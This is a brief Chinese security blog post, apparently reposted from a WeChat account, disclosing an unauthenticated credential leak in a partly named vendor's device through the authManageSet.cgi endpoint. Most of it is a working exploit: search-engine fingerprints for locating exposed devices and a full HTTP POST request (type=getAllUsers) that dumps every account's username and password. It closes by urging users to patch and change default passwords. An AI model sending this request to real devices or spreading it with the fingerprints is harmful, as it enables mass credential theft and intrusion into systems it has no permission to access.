师傅们,我来水一篇文章,最近出了某神的authManageSet.cgi接口泄露账号密码,直接构造特定的数据包可直接发现账号密码。
body="sec_gate_image/login_02.gif"
fid="ldb0WVBlAgZloMw9AAge0A=="
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
发现该账号密码还是该产品的默认账号密码,使用了该产品的师傅们记得及时联系厂商修复以及更改默认账号密码!
原文始发于微信公众号(网络安全007):【1day】某神authManageSet.cgi接口泄露账号密码
点赞
https://cn-sec.com/archives/2289972.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
- 本文由 admin 发表于 2023年12月12日14:38:36
- 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
【1day】某神authManageSet.cgi接口泄露账号密码https://cn-sec.com/archives/2289972.html
|
评论